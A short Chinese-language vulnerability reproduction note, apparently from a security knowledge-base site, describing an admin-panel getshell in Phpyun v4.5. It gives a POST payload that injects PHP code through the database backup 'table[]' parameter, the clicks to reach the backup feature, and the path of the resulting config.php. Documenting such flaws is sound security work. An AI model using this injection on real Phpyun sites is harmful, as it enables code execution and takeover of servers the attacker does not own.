menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 106-PHPYun chevron_right 003-Phpyun v4.5 后台getshell.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    003-Phpyun v4.5 后台getshell.md
    742 B / 2021-07-17 00:01:24
        # Phpyun v4.5 后台getshell

### 一、漏洞简介

### 二、漏洞影响

Phpyun v4.5

### 三、复现过程

payload:


```bash
Url: http://url/admin/index.php?m=database&c=backup  

Post: 
pytoken=3c3140b58f5e&table[]=]=1;phpinfo();//&maxfilesize=1111
```

漏洞复现过程: 首先进入后台-》点击工具-》数据-》数据库管理-》自定义备份-》随便选择一个表-》提交备份

![](images/15893365748715.png)


抓包,修改table[] 参数-》发送

![](images/15893365817382.png)


![](images/15893365857997.png)


产生的文件就在uploads/data/plus/bdata/phpyun_20200312153927/config.php

Url:访问(这里搭建的时候环境,我默认指向了uploads)

![](images/15893365949820.png)
    links
    file_download